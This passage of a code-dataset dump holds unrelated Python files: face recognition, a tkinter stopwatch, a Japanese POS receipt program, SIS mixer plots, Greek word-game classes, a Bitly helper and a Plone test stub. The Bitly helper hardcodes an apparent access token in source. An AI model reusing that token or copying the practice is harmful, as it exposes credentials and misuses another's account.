y2,face_descriptor,face_alignment_predictor):\n \"\"\"\n Determine whether the face contained within the bounding box exists in our database\n\n x1,y1_____________\n | |\n | |\n |_________________x2,y2\n\n \"\"\"\n height, width, channels = frame.shape\n # The padding is necessary since the OpenCV face detector creates the bounding box around the face and not the head\n part_image = frame[max(0, y1):min(height, y2), max(0, x1):min(width, x2)]\n # FACE ALIGNMENT HERE\n landmarks=face_alignment_predictor.get_landmarks(part_image)\n if(landmarks!=[] and 
landmarks!=None):\n part_image=execute_alignment(part_image,landmarks)\n prediction=get_embedding(part_image,face_descriptor)\n return who_is_it(database,prediction)\n \n\ndef who_is_it(database,encoding,epsilon=800):\n \"\"\"\n Arguments:\n image_path -- path to an image\n database -- database containing image encodings along with the name of the person on the image\n model -- your Inception model instance in Keras\n \n Returns:\n min_dist -- the minimum distance between image_path encoding and the encodings from the database\n identity -- string, the name prediction for the person on image_path\n \"\"\"\n identity = \"Unknown\"\n # Loop over the database dictionary's names and encodings.\n i=0\n for db_enc in database[\"encodings\"]:\n cosine_similarity=face_compare(encoding, db_enc)\n if cosine_similarity < epsilon:\n identity = database[\"names\"][i]\n break\n i+=1\n return identity\n\nif __name__ == \"__main__\":\n database = prepare_database()\n webcam_face_recognizer(database)\n \n\n\n","sub_path":"livestream/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"213505152","text":"from tkinter import Button, Label, Tk\r\nroot = Tk()\r\ntime = 0\r\nafter_id = \"\"\r\nstate = False\r\ndef get_time():\r\n global time\r\n return str((time // 600000)%6) + str((time // 60000)%10) + ':'+str((time // 10000)%6) + str((time // 1000)%10) +':'+ str((time // 100)%10) + str((time // 10)%10) + str(time %10)\r\ndef start_clock():\r\n global time, after_id\r\n after_id = root.after(1, start_clock)\r\n text.configure(text = get_time())\r\n time +=1\r\ndef stop_clock():\r\n global after_id\r\n root.after_cancel(after_id)\r\ndef cmd():\r\n global state\r\n if not state:\r\n state = True\r\n reset.configure(state = \"disable\")\r\n start_and_stop.configure(text = \"Stop\")\r\n start_clock()\r\n else:\r\n state = False\r\n reset['state']=\"active\"\r\n start_and_stop.configure(text = \"Start\")\r\n stop_clock()\r\ndef reset_clock():\r\n global time\r\n time = 0\r\n text.configure(text=get_time())\r\ntext = Label(font = (\"Arial\", 30), text = get_time())\r\ntext.grid(row = 0, column = 0)\r\nstart_and_stop = Button(font = (\"Arial\", 30), text = \"Start\", command = cmd, width = 5, height = 1)\r\nstart_and_stop.grid(row = 0, column = 1)\r\nreset = Button(font = (\"Arial\", 30), text = \"Reset\", command = reset_clock, width = 5, height = 1)\r\nreset.grid(row = 0, column = 2)\r\nroot.geometry(\"450x200\")\r\nroot.mainloop()","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"126808726","text":"import pandas as pd\nimport sys\nimport datetime\n\nITEM_MASTER_CSV_PATH=\"./item_master.csv\"\nRECEIPT_FOLDER=\"./receipt\"\n\n### 商品クラス\nclass Item:\n def __init__(self,item_code,item_name,price):\n self.item_code=item_code\n self.item_name=item_name\n self.price=price\n\n### オーダークラス\nclass Order:\n def __init__(self,item_master):\n self.item_order_list=[]\n self.item_count_list=[]\n self.item_master=item_master\n self.set_datetime()\n \n def set_datetime(self):\n self.datetime = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')\n \n def add_item_order(self,item_code,item_count):\n self.item_order_list.append(item_code)\n self.item_count_list.append(item_count)\n \n def view_item_list(self):\n for item in self.item_order_list:\n 
print(\"商品コード:{}\".format(item))\n \n # オーダー番号から商品情報を取得する\n def get_item_data(self,item_code):\n for m in self.item_master:\n if item_code == m.item_code:\n return m.item_name,m.price\n \n # オーダー入力\n def input_order(self):\n print(\"いらっしゃいませ!\")\n while True:\n buy_item_code = input(\"購入したい商品コードを入力してください。終了する場合は、0を入力してください >>> \")\n if int(buy_item_code) != 0:\n item = self.get_item_data(buy_item_code)\n if item!=None:\n print(\"{0} ({1}円)が登録されました\".format(item[0], item[1]))\n buy_item_count = input(\"購入個数を入力してください >>> \")\n self.add_item_order(buy_item_code,buy_item_count)\n else:\n print(\"「{}」は商品マスタに存在しません\".format(buy_item_code))\n else:\n print(\"商品登録を終了します。\")\n break\n\n def order_detail(self):\n number = 1\n self.sum_price = 0\n self.sum_count = 0\n self.receipt_name = \"receipt_{}.log\".format(self.datetime)\n self.write_receipt(\"-----------------------------------------------\")\n self.write_receipt(\"オーダー登録された商品一覧\\n\")\n for item_order,item_count in zip(self.item_order_list,self.item_count_list):\n result = self.get_item_data(item_order)\n self.sum_price += result[1] * int(item_count)\n self.sum_count += int(item_count)\n receipt_data = \"{0}.{2}({1}) : ¥{3:,} {4}個 = ¥{5:,}\".format(number, item_order, result[0], result[1], item_count, int(result[1]) * int(item_count))\n self.write_receipt(receipt_data)\n number += 1\n \n # 合計金額、個数の表示\n self.write_receipt(\"-----------------------------------------------\")\n self.write_receipt(\"合計金額:¥{0} {1}個\".format(self.sum_price,self.sum_count))\n \n def calc_money(self):\n if len(self.item_order_list) >= 1:\n while True:\n self.money = input(\"お支払い金額を入力してください >>> \")\n self.change_money = int(self.money) - self.sum_price\n if self.change_money >= 0:\n self.write_receipt(\"お預り:¥{}\".format(self.money))\n self.write_receipt(\"お釣り:¥{}\".format(self.change_money))\n break\n else:\n print(\"¥{} 円不足しています。再度入力してください\".format(self.change_money))\n \n print(\"ありがとうございました。\")\n \n def write_receipt(self,text):\n print(text)\n with open(RECEIPT_FOLDER + \"\\\\\" + self.receipt_name,mode=\"a\",encoding=\"utf-8_sig\") as f:\n f.write(text+\"\\n\") \n \n### マスタ登録\ndef regist_item_by_csv(csv_path):\n print(\"------- マスタ登録開始 ---------\")\n item_master = []\n count=0\n try:\n # item_codeの0が落ちるため、dtypeを設定\n item_master_df = pd.read_csv(csv_path,dtype = {\"item_code\":object})\n for item_code,item_name,price in zip(list(item_master_df[\"item_code\"]),list(item_master_df[\"item_name\"]),list(item_master_df[\"price\"])):\n item_master.append(Item(item_code,item_name,price))\n print(\"{}({})\".format(item_name,item_code))\n count+=1\n print(\"{}品の登録を完了しました。\".format(count))\n print(\"------- マスタ登録完了 ---------\")\n return item_master\n except:\n print(\"マスタ登録が失敗しました\")\n print(\"------- マスタ登録完了 ---------\")\n sys.exit()\n \n\n### メイン処理\ndef main():\n # CSVからマスタへ登録\n item_master=regist_item_by_csv(ITEM_MASTER_CSV_PATH)\n # マスタをオーダーに登録\n order=Order(item_master)\n # オーダー入力\n order.input_order()\n # オーダー番号から商品情報を取得\n order.order_detail()\n order.calc_money()\n\nif __name__ == \"__main__\":\n main()","sub_path":"pos_system.py","file_name":"pos_system.py","file_ext":"py","file_size_in_byte":5189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"506832047","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 26 10:48:32 2019\n\n@author: wenninger\n\"\"\"\n#TODO/Note: The way the program is written, the program works only under Spyder IPython console, which is not closing a plot 
after savefig.\n\nimport os\nfrom matplotlib.colors import LogNorm\nimport matplotlib.pylab as plt\nimport matplotlib.patches as mpatches\nimport numpy as np\n\nfrom Mixer import Mixer,kwargs_Mixer_John\nfrom plotxy import plot, pltsettings,lbl\n\nplt.close() # in case a plot is still open\n\nheadDirectory = 'Impedance_Recovery/Simulated_Curves_2019_12_10/'\n\n#initialise a Mixer object\nM = Mixer('DummyData/John/Unpumped.csv','DummyData/John/Pumped.csv',**kwargs_Mixer_John)\n \nM.Unpumped.convolution_most_parameters_Fit_Calc()\nM.Unpumped.convolution_without_excessCurrent_Fit_Calc()\nfits = [M.Unpumped.chalmers_Fit,M.Unpumped.convolution_Fit,M.Unpumped.convolution_without_excessCurrent_Fit,M.Unpumped.convolution_perfect_IV_curve_Fit]\ndirectories = ['Chalmers','Convolution','Convolution_without_excessCurrent','Convolution_perfect_IV']\nfor i in range(len(fits)):\n print('Process '+directories[i])\n \n # set directory for images\n directory =headDirectory+directories[i]+'/'\n if not os.path.exists(directory):\n os.makedirs(directory)\n \n #Define the used fit in the mixer calculations\n M.Unpumped.set_simulatedIV(fits[i])\n \n plot(M.pumping_Levels_Volt, label='Pumping Level')\n description='Pumping_Level_Volt'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['mV'],title=description.replace('_',' '),close=True)\n \n plot(M.pumping_Levels, label='Pumping Level')\n description='Pumping_Level'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel='alhpa',title=description.replace('_',' '),close=True)\n \n plot(M.Unpumped.rawIVDataOffsetCorrected,'Measurement')\n plot(M.Unpumped.simulatedIV,'Simulation')\n description='Fitting_to_Measurement'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,6.],ylim=[-410,410],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Normal_Resistance'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.9,6.],ylim=[190,410],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Subgap_Resistance'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2,2.6],ylim=[-10,10],title=description.replace('_',' '),close=False)\n description='Fitting_to_Measurement_Zoom_Transission'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.6,2.9],ylim=[0,200],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_Unpumped_Pumped_IV_curves()\n description='Pumped_from_Unpumped_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[0,6.],ylim=[0,400],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,0],ylim=[-400,0],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2.7,2.7],ylim=[-50,50],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-.1,2.7],ylim=[-2,63],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Subgap_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-2.7,.1],ylim=[-63,2],title=description.replace('_',' '),close=False)\n 
description='Pumped_from_Unpumped_Normal_Resistance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[2.7,4.7],ylim=[160,310],title=description.replace('_',' '),close=False)\n description='Pumped_from_Unpumped_Normal_Resistance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-4.7,-2.65],ylim=[-310,-140],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_AC_currents()\n description='SIS_Current_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-.1,6],ylim=[-155,145],title=description.replace('_',' '),close=False)\n description='SIS_Current_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],xlim=[-6,.1],ylim=[-140,205],title=description.replace('_',' '),close=True)\n \n M.plot_simulated_and_measured_ySIS()\n description='SIS_Admittance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[0,6],ylim=[-.22,.2],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Admittance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,0],ylim=[-.22,.2],title=description.replace('_',' '),legendColumns=2,close=True)\n \n plt.plot(M.ySIS[0],np.abs(M.ySIS[1]),label='Measurement')\n plt.plot(M.simulated_ySIS[0],np.abs(M.simulated_ySIS[1]),label='Simulation')\n description='SIS_Admittance_Absolute_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[0,6],ylim=[0,.2],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Admittance_Absolute_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,0],ylim=[0,.2],title=description.replace('_',' '),legendColumns=2,close=True)\n\n M.plot_simulated_and_measured_zSIS()\n description='SIS_Impedance_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[0,6],ylim=[-30,30],title=description.replace('_',' '),close=False)\n description='SIS_Impedance_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[-6,0],ylim=[-30,30],title=description.replace('_',' '),close=True)\n \n plt.plot(M.zSIS[0],np.abs(M.zSIS[1]),label='Measurement')\n plt.plot(M.simulated_zSIS[0],np.abs(M.simulated_zSIS[1]),label='Simulation')\n description='SIS_Impedance_Absolute_pos'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[0,6],ylim=[0,30],title=description.replace('_',' '),legendColumns=2,close=False)\n description='SIS_Impedance_Absolute_neg'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Ohm'],xlim=[-6,0],ylim=[0,40],title=description.replace('_',' '),legendColumns=2,close=True)\n\n M.plot_mask_steps()\n description='Masked_Regions'\n pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['uA'],title=description.replace('_',' '),close=True)\n \n# description='Admittance_Complete'\n# yEmb = M.simulated_yEmb #TODO does not work\n# zEmb = M.simulated_zEmb\n# yPatch = mpatches.Patch(color='none', label='Y = %.2f %.2fj $\\Omega^{-1}$'%(yEmb[0],yEmb[1])) \n# zPatch = mpatches.Patch(color='none', label='Z = %.2f %.2fj $\\Omega$'%(zEmb[0],zEmb[1])) \n# \n# handles, labels = plt.gca().get_legend_handles_labels() # get existing handles and labels\n# handles.append(yPatch) # add new patches and labels to list\n# handles.append(zPatch) # add new patches and labels to list\n# labels.append('Y = %.2f %.2fj 
$\\mho$'%(yEmb[0],yEmb[1]))\n# labels.append('Z = %.2f %.2fj $\\Omega$'%(zEmb[0],zEmb[1]))\n# \n# plt.legend(handles, labels,loc='best', shadow=False,ncol=2)\n# leg = plt.gca().get_legend()\n# ltext = leg.get_texts() # all the text.Text instance in the legend\n# llines = leg.get_lines() # all the lines.Line2D instance in the legend\n# plt.setp(ltext, fontsize='small')\n# plt.setp(llines, linewidth=1.5) # the legend linewidth\\z\\\n# \n# pltsettings(save=directory+description,xlabel=lbl['mV'],ylabel=lbl['Y'],xlim=[-6,6],ylim=[-.2,.053],title=description.replace('_',' '),close=True,skip_legend=True)\n \n \n","sub_path":"Simulated_Data_Calculations.py","file_name":"Simulated_Data_Calculations.py","file_ext":"py","file_size_in_byte":8101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"191764154","text":"from random import shuffle\r\nfrom time import sleep\r\n\r\nclass SakClass:\r\n\r\n \r\n def __init__(self): \r\n \r\n self.letters= ['Α','Α','Α','Α','Α','Α','Α','Α','Α','Α','Α','Α',\r\n 'Β',\r\n 'Γ','Γ',\r\n 'Δ','Δ',\r\n 'Ε','Ε','Ε','Ε','Ε','Ε','Ε','Ε',\r\n 'Ζ',\r\n 'Η','Η','Η','Η','Η','Η','Η',\r\n 'Θ',\r\n 'Ι','Ι','Ι','Ι','Ι','Ι','Ι','Ι',\r\n 'Κ','Κ','Κ','Κ',\r\n 'Λ','Λ','Λ',\r\n 'Μ','Μ','Μ',\r\n 'Ν','Ν','Ν','Ν','Ν','Ν',\r\n 'Ξ',\r\n 'Ο','Ο','Ο','Ο','Ο','Ο','Ο','Ο','Ο',\r\n 'Π','Π','Π','Π',\r\n 'Ρ','Ρ','Ρ','Ρ','Ρ',\r\n 'Σ','Σ','Σ','Σ','Σ','Σ','Σ',\r\n 'Τ','Τ','Τ','Τ','Τ','Τ','Τ','Τ',\r\n 'Υ','Υ','Υ','Υ',\r\n 'Φ',\r\n 'Χ',\r\n 'Ψ',\r\n 'Ω','Ω','Ω']\r\n \r\n\r\n\r\n def shuffleSak(self):\r\n shuffle(self.letters)\r\n print('ΑΝΑΚΑΤΕΥΕΤΑΙ ΤΟ ΣΑΚΟΥΛΙ')\r\n for i in range(0,4):\r\n sleep(0.7)\r\n print('.', end='', flush=True)\r\n print(\"\\n\")\r\n \r\n\r\n def get(self,numb):\r\n lootedList = []\r\n for number in range(0,numb):\r\n lootedList.append(self.letters.pop(0))\r\n return lootedList\r\n\r\n def throw(self,word,hand):\r\n for letter in range(0,len(word)):\r\n for letter2 in range(0,7):\r\n if(word[letter]==hand[letter2]):\r\n del(hand[letter2])\r\n break\r\n \r\n \r\n \r\n \r\n\r\n def change(self,hand):\r\n newHand= self.get(7)\r\n for number in range(0,7):\r\n self.letters.append(hand.pop(0))\r\n return newHand\r\n\r\n \r\n\r\n\r\n \r\nclass Player:\r\n\r\n def __init__(self,name):\r\n\r\n self.name = name\r\n self.hand = []\r\n self.points = 0\r\n\r\n def updatePlayerPoints(self,word,wordDict):\r\n self.points = wordDict[word]+ self.points\r\n\r\n def fullHandWithLetters(self,sak):\r\n if (len(self.hand)==7):\r\n return True\r\n\r\n if (len(sak.letters) >= (7-len(self.hand))):\r\n self.hand = self.hand + sak.get(7-len(self.hand))\r\n return True\r\n\r\n return False\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\nclass Dictionary:\r\n def __init__(self):\r\n\r\n self.wordDictionary={}\r\n\r\n self.letterValue = {'Α':1,'Ε':1,'Η':1,'Ι':1,'Ν':1,'Ο':1,'Σ':1,'Τ':1,\r\n 'Κ':2,'Π':2,'Ρ':2,'Υ':2,\r\n 'Λ':3,'Μ':3,'Ω':3,\r\n 'Γ':4,'Δ':4,\r\n 'Β':8,'Φ':8,'Χ':8,\r\n 'Ζ':10,'Θ':10,'Ξ':10,'Ψ':10}\r\n\r\n def findWordValue(word):\r\n value=0\r\n for i in range(0,len(word)):\r\n value = self.letterValue[word[i]] + value\r\n return value\r\n \r\n fileGreek7 = open('greek7.txt',encoding='utf-8-sig',mode='r')\r\n\r\n for index in fileGreek7:\r\n currentWord = index.rstrip(\"\\n\")\r\n self.wordDictionary[currentWord]= findWordValue(currentWord)\r\n\r\n fileGreek7.close()\r\n\r\n def findValue(self,word):\r\n value=0\r\n for i in range(0,len(word)):\r\n value = self.letterValue[word[i]] + value\r\n return value\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n 
\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","sub_path":"mylib21582311.py","file_name":"mylib21582311.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"323948934","text":"from abc import ABC, abstractmethod\nimport typing\n\n\nclass IImageFormatConverter(ABC):\n\n IMAGE_FORMAT = None\n IMAGE_EXTENSION = None\n\n def __init__(\n self, src_file_spec: str, output_file: typing.Optional[str] = None,\n output_folder: typing.Optional[str] = '.', extension: typing.Optional[int] = None, **kwargs) -> None:\n \"\"\"\n :param src_file_spec: File path and file name of the source file.\n :param output_file: Base filename for output image file names.\n :param output_folder: File path for output image file names.\n :param extension: Output file extension\n :param kwargs: Any additional args for overloading child __init__()\n\n \"\"\"\n self.src_file_spec = src_file_spec\n self.output_file = output_file\n self.output_folder = output_folder\n\n self.fmt = self.IMAGE_FORMAT\n self.extension = extension or self.IMAGE_EXTENSION\n\n # If the format or extension is not provided, do not continue.\n if self.fmt is None or self.extension is None:\n raise Exception(f\"{self.__class__.__name__}: Image format or extension is not set.\")\n\n # Used for tracking the time required to convert the pdf to image.\n self.conversion_duration = 0\n\n # Used for providing which class through an exception.\n self.images = []\n\n @abstractmethod\n def convert(self) -> \"IImageFormatConverter\":\n \"\"\"\n Implemented instance of this function should return the instance of the obj\n e.g. -\n\n def convert():\n \n return self\n\n :return:\n self\n \"\"\"\n pass\n","sub_path":"pdf_conversion/converters/image_converter.py","file_name":"image_converter.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"399922442","text":"import urllib\nimport json\n\nTOKEN=\"cc922578a7a1c6065a2aa91bc62b02e41a99afdb\"\nROOT_URL=\"https://api-ssl.bitly.com\"\nSHORTEN=\"/v3/shorten?access_token={}&longUrl={}\"\n\nclass BitlyHelper:\n\n\tdef shorten_url(self,longurl):\n\t\ttry:\n\t\t\turl=ROOT_URL + SHORTEN.format(TOKEN, longurl)\n\t\t\tprint(url)\n\t\t\tresponse=urllib.request.urlopen(url).read()\n\t\t\tjr = json.loads(response.decode('utf-8') )\n\t\t\tshorted = jr['data']['url']\n\t\t\tif shorted:\n\t\t\t\treturn shorted\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\n\t\treturn longurl\n\n","sub_path":"bitlyhelper.py","file_name":"bitlyhelper.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"616767462","text":"class Person ():\n # how to initialize attributes\n # init method\n def __init__(self,person_name,person_age,person_weight,person_height):\n self.name=person_name\n self.age=person_age\n self.weight=person_weight\n self.height=person_height\n\nperson1 = Person(\"vicky\",20,\"69 kg\" ,\"170 cm\")\n# self = person1\n\nprint(person1.name)\n\nperson2 = Person(\"siva\",18,\"55 kg\",\"159 cm\")\n\nprint(person2.height)\n","sub_path":"class,difaine.py","file_name":"class,difaine.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"286087844","text":"def Difference(originalFile, newFile):\n 
oldfiles = open(originalFile)\n    newfiles = open(newFile)\n    oldfile = [x[:-1] for x in oldfiles]\n    newfile = [x[:-1] for x in newfiles]\n    #dictionary of ranges per card\n    Cards = {'A':[[12,13],[13,18],[18,50],[50,51],[51,52],[52,53],[53,54],[54,55],[55,74],[74,75],[75,77]],\n             'B':[[12,15],[15,28],[28,32],[32,34],[34,44],[44,46],[46,56],[56,61],[61,64],[64,70],[70,71],[71,73],[73,74],[74,75],[75,76],[76,77]],\n             'C':[[12,17],[17,18],[18,21],[21,25],[25,30],[30,38],[38,46],[46,53],[53,59],[59,64],[64,69],[69,73],[73,74],[74,77]],\n             'D':[[12,20],[20,52],[52,53],[53,54],[54,55],[55,56],[56,57],[57,59],[59,62],[62,65],[65,68],[68,71],[71,74],[74,77]],\n             'E':[[12,14],[14,16],[16,18],[18,20],[20,22],[22,24],[24,26],[26,29],[29,32],[32,35],[35,38],[38,41],[41,44],[44,47],[47,50],[50,53],[53,56],[56,59],[59,65],[65,71],[71,73],[73,74],[74,75],[75,76],[76,77]],\n             'F':[[12,27],[27,29],[29,39],[39,49],[49,51],[51,56],[56,57],[57,63],[63,69],[69,77]],\n             'G':[[12,33],[33,39],[39,77]],\n             'H':[[12,30],[30,32],[32,77]],\n             'J':[[12,15],[15,19],[19,23],[23,25],[25,26],[26,29],[29,40],[40,45],[45,53],[53,54],[54,55],[55,60],[60,68],[68,69],[69,70],[70,71],[71,76],[76,77]],\n             'K':[[12,15],[15,19],[19,23],[23,77]],\n             'M':[[12,77]]}\n    class plisn(object):\n        def __init__(self, PLISN):\n            self.old = {}\n            self.new = {}\n            self.oldcards = []\n            self.newcards = []\n            self.consolcards = []\n            self.compared = \"\"\n            self.PLISN = PLISN\n            self.convert()\n\n        def convert(self):\n            self.order = \"\"\n            for i in self.PLISN:\n                if ord(i) > 64:\n                    self.order += str(ord(str(i))-43)\n                else:\n                    self.order += str(ord(str(i)))\n\n        def olds(self, card):\n            self.old[card[-3:]] = card\n            self.oldcards.append(card[-3:])\n        def news(self, card):\n            self.new[card[-3:]] = card\n            self.newcards.append(card[-3:])\n        def compare(self):\n            order = ['01A', '02A', '03A', '04A', '01B', '02B','03B', '04B','01C', '02C',\n                     '03C', '04C','01D', '02D','03D', '04D','01E', '02E','03E', '04E','01F',\n                     '02F','03F', '04F', '01G', '02G','03G', '04G', '01H', '02H','03H',\n                     '04H','01J', '02J','03J', '04J','01K', '02K','03K', '04K','01M', '02M',\n                     '03M', '04M']\n            for i in order:\n                if i in self.newcards or i in self.oldcards:\n                    self.consolcards.append(i)\n            if self.new == {}:\n                self.compared += self.old[\"01A\"][:11] + \"D \" + self.old[\"01A\"][13:50] + (\" \" * 27) + self.old[\"01A\"][77:] + '\\n'\n            elif self.old == {}:\n                for i in self.newcards:\n                    self.compared += self.new[i] + '\\n'\n            else:\n                for i in self.consolcards:\n                    if i not in self.oldcards:\n                        self.compared += self.new[i][:11] + \"M\" + self.new[i][12:] + '\\n'\n                    elif i not in self.newcards:\n                        self.compared += self.old[i][:11] + \"G\"\n                        for param in Cards[i[-1]]:\n                            if self.old[i][param[0]:param[1]].strip() == \"\":\n                                self.compared += FixLengths(param[1] - param[0])\n                            else:\n                                self.compared += 'G' + FixLengths(param[1] - param[0])[1:]\n                        self.compared += i + '\\n'\n                    elif self.new[i] != self.old[i]:\n                        self.compared += CompareCards(self.old[i], self.new[i])\n            self.compared = self.compared[:-1]\n\n    def CompareCards(old, new):\n        beginCard = new[:11]\n        endCard = new[77:]\n        mcard = \"\"\n        gcard = \"\"\n        keyparam = [[12,17],[12,20],[12,27],[20,52],[55,56]] #key parameters that get g cards even for modifications\n        #associated data has not been incorporated yet\n        
associatedparams = {31:[[50,51]],68:[[50,51]],29:[[51,52]],39:[[18,21]],72:[[52,53],\n [53,54]],111:[[29,39],[39,49],[33,39],[27,29],[51,56],[49,51]]} # add keyparams together for key to check associated data\n for param in Cards[new[-1]]:\n oldparam = CheckCard(param,old)\n newparam = CheckCard(param,new)\n if oldparam == newparam:\n if int(new[-2]) > 1:\n if param in [[13,18],[18,50]]:\n gcard += oldparam\n else:\n mcard+=FixLengths(param[1] - param[0])\n gcard+=FixLengths(param[1] - param[0])\n else:\n mcard+=FixLengths(param[1] - param[0])\n gcard+=FixLengths(param[1] - param[0])\n elif newparam == FixLengths(param[1] - param[0]):\n gcard += 'G' + FixLengths(param[1] - param[0])[1:]\n mcard += FixLengths(param[1] - param[0])\n else:\n mcard += newparam\n if param in keyparam:\n gcard += oldparam\n elif int(new[-2]) > 1:\n if param in [[13,18],[18,50]]:\n gcard += oldparam\n else:\n gcard += FixLengths(param[1] - param[0])\n if mcard.strip() != \"\":\n mcard = beginCard + \"M\" + mcard +endCard + '\\n'\n else:\n mcard = \"\"\n if gcard.strip() != \"\":\n gcard = beginCard + \"G\" + gcard + endCard + '\\n'\n return gcard + mcard\n return mcard\n\n def FixLengths(length):\n return length * \" \"\n\n def CheckCard(param, card):\n return card[param[0]:param[1]]\n\n PLISNs = {}\n\n for i in oldfile:\n if i[6:11].strip() not in PLISNs:\n PLISNs[i[6:11].strip()] = plisn(i[6:11].strip())\n PLISNs[i[6:11].strip()].olds(i)\n else:\n PLISNs[i[6:11].strip()].olds(i)\n for i in newfile:\n if i[6:11].strip() not in PLISNs:\n PLISNs[i[6:11].strip()] = plisn(i[6:11].strip())\n PLISNs[i[6:11].strip()].news(i)\n else:\n PLISNs[i[6:11].strip()].news(i)\n printOrder = []\n with open('_'.join(['Differences_',originalFile,newFile]) +'.txt', 'w') as report:\n for i in PLISNs:\n printOrder.append(PLISNs[i])\n printOrder.sort(key=lambda x: x.order)\n for i in printOrder:\n i.compare()\n if i.compared != \"\":\n report.write(i.compared + '\\n')\n\n oldfiles.close() \n newfiles.close()\n","sub_path":"QEI_NHA_SAP/lib/DIFFERENCE.pyw","file_name":"DIFFERENCE.pyw","file_ext":"pyw","file_size_in_byte":9283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255096202","text":"# -*- coding: utf-8 -*-\nfrom plone import api\nfrom plone.app.event.base import localized_now\nfrom Products.CMFCore.utils import getToolByName\nfrom genweb.theme.portlets import esdeveniments\nfrom genweb.core.testing import GENWEB_INTEGRATION_TESTING\nfrom plone.app.testing import login\nfrom plone.app.testing import TEST_USER_ID\nfrom plone.app.testing import TEST_USER_NAME\nfrom plone.app.testing import setRoles\nfrom plone.portlets.interfaces import IPortletManager\nfrom plone.portlets.interfaces import IPortletRenderer\nfrom zope.component import getUtility\nfrom zope.component import getMultiAdapter\nfrom zope.component.hooks import setHooks\nfrom zope.component.hooks import setSite\n\nfrom plone.app.event.dx.behaviors import EventAccessor\n\nfrom datetime import timedelta\nimport unittest2 as unittest\n\nTZNAME = 'Europe/Vienna'\n\n\nclass RendererTest(unittest.TestCase):\n layer = GENWEB_INTEGRATION_TESTING\n\n def setUp(self):\n portal = self.layer['portal']\n self.portal = portal\n self.request = self.layer['request']\n self.wft = getToolByName(self.portal, 'portal_workflow')\n setRoles(portal, TEST_USER_ID, ['Manager'])\n setHooks()\n setSite(portal)\n folder_id = self.portal.invokeFactory('Folder', 'test-folder')\n self.folder = self.portal[folder_id]\n\n # Make sure Events use 
